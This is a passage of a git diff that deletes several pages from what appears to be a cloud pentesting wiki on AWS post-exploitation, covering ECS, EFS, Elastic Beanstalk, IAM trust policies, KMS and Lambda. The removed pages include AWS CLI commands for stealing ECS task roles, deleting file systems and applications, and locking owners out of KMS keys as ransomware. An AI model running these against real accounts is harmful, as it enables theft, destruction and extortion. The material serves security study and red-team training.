-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
deleted file mode 100644
index 51e033417..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
+++ /dev/null
@@ -1,41 +0,0 @@
-# AWS - Malicious VPC Mirror
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** - -Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. - -To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. - -The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. - -For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. 
The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
deleted file mode 100644
index 096bdaea6..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# AWS - ECS Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECS - -For more information check: - -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} - -### Host IAM Roles - -In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ -Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -{% hint style="danger" %} -Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. -{% endhint %} - -### Privesc to node to steal other containers creds & secrets - -But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. - -#### Making containers run in current host - -Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. 
- -```bash -aws ecs update-container-instances-state \ - --cluster --status DRAINING --container-instances -``` - -The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:** - -```bash -aws ecs deregister-container-instance \ - --cluster --container-instance --force -``` - -A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: - -```bash -# Needs: ecs:SubmitTaskStateChange -aws ecs submit-task-state-change --cluster \ - --status STOPPED --reason "anything" --containers [...] - -# Needs: ecs:SubmitContainerStateChange -aws ecs submit-container-state-change ... - -# Needs: ecs:SubmitAttachmentStateChanges -aws ecs submit-attachment-state-changes ... -``` - -### Steal sensitive info from ECR containers - -The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
deleted file mode 100644
index 1a78c9dd2..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
+++ /dev/null
@@ -1,80 +0,0 @@
-# AWS - EFS Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EFS - -For more information check: - -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} - -### `elasticfilesystem:DeleteMountTarget` - -An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. - -```sql -aws efs delete-mount-target --mount-target-id -``` - -**Potential Impact**: Disruption of file system access and potential data loss for users or applications. - -### `elasticfilesystem:DeleteFileSystem` - -An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. - -```perl -aws efs delete-file-system --file-system-id -``` - -**Potential Impact**: Data loss and service disruption for applications using the deleted file system. - -### `elasticfilesystem:UpdateFileSystem` - -An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. - -```sql -aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps -``` - -**Potential Impact**: Degradation of file system performance or resource exhaustion. - -### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` - -An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. - -```arduino -aws efs create-access-point --file-system-id --posix-user --root-directory -aws efs delete-access-point --access-point-id -``` - -**Potential Impact**: Unauthorized access to the file system, data exposure or modification. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
deleted file mode 100644
index 4856870bc..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
+++ /dev/null
@@ -1,121 +0,0 @@
-# AWS - Elastic Beanstalk Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Elastic Beanstalk - -For more information: - -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} - -### `elasticbeanstalk:DeleteApplicationVersion` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version -``` -{% endcode %} - -**Potential Impact**: Disruption of application deployment and potential loss of application versions. - -### `elasticbeanstalk:TerminateEnvironment` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk terminate-environment --environment-name my-existing-env -``` -{% endcode %} - -**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. - -### `elasticbeanstalk:DeleteApplication` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. 
- -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force -``` -{% endcode %} - -**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. - -### `elasticbeanstalk:SwapEnvironmentCNAMEs` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 -``` -{% endcode %} - -**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. - -### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 - -aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag -``` -{% endcode %} - -**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
deleted file mode 100644
index 7a73ed2bd..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
+++ /dev/null
@@ -1,130 +0,0 @@
-# AWS - IAM Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information about IAM access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -## Confused Deputy Problem - -If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. - -Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. - -
- -However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. - -Example: - -```json -{ - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Principal": { - "AWS": "Example Corp's AWS Account ID" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "12345" - } - } - } -} -``` - -{% hint style="warning" %} -For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. -{% endhint %} - -### Unexpected Trusts - -#### Wildcard as principal - -```json -{ - "Action": "sts:AssumeRole", - "Effect": "Allow", - "Principal": { "AWS": "*" }, -} -``` - -This policy **allows all AWS** to assume the role. - -#### Service as principal - -```json -{ - "Action": "lambda:InvokeFunction", - "Effect": "Allow", - "Principal": { "Service": "apigateway.amazonaws.com" }, - "Resource": "arn:aws:lambda:000000000000:function:foo" -} -``` - -This policy **allows any account** to configure their apigateway to call this Lambda. - -#### S3 as principal - -```json -"Condition": { -"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, - "StringEquals": { - "aws:SourceAccount": "123456789012" - } -} -``` - -If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. 
- -#### Not supported - -```json -{ - "Effect": "Allow", - "Principal": {"Service": "cloudtrail.amazonaws.com"}, - "Action": "s3:PutObject", - "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" -} -``` - -A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). - -## References - -* [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
deleted file mode 100644
index 18859e4f3..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
+++ /dev/null
@@ -1,163 +0,0 @@
-# AWS - KMS Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For more information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Encrypt/Decrypt information - -`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: - -* `fileb://:` Reads the file in binary mode, commonly used for non-text files. -* `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. - -{% hint style="success" %} -Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) -{% endhint %} - -* Using a **symmetric** key - -```bash -# Encrypt data -aws kms encrypt \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -* Using a **asymmetric** key: - -```bash -# Encrypt data -aws kms encrypt \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -### KMS Ransomware - -An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. 
- -Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. - -{% hint style="warning" %} -Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. - -Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). -{% endhint %} - -```bash -# Force policy change -aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ - --policy-name default \ - --policy file:///tmp/policy.yaml \ - --bypass-policy-lockout-safety-check - -{ - "Id": "key-consolepolicy-3", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - } - ] -} -``` - -{% hint style="danger" %} -Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. -{% endhint %} - -
- -### Generic KMS Ransomware - -#### Global KMS Ransomware - -There is another way to perform a global KMS Ransomware, which would involve the following steps: - -* Create a new **key with a key material** imported by the attacker -* **Re-encrypt older data** encrypted with the previous version with the new one. -* **Delete the KMS key** -* Now only the attacker, who has the original key material could be able to decrypt the encrypted data - -### Destroy keys - -```bash -# Destoy they key material previously imported making the key useless -aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab - -# Schedule the destoy of a key (min wait time is 7 days) -aws kms schedule-key-deletion \ - --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ - --pending-window-in-days 7 -``` - -{% hint style="danger" %} -Note that AWS now **prevents the previous actions from being performed from a cross account:** -{% endhint %} - -
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
deleted file mode 100644
index f7bea8e86..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
+++ /dev/null
@@ -1,55 +0,0 @@
-# AWS - Lambda Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda - -For more information check: - -{% content-ref url="../../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests - -If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. - -{% content-ref url="aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](aws-warm-lambda-persistence.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests & Extensions Requests - -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. - -{% content-ref url="../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md" %} -[aws-abusing-lambda-extensions.md](../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
deleted file mode 100644
index 94ea21684..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
+++ /dev/null
@@ -1,89 +0,0 @@
-# AWS - Steal Lambda Requests
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
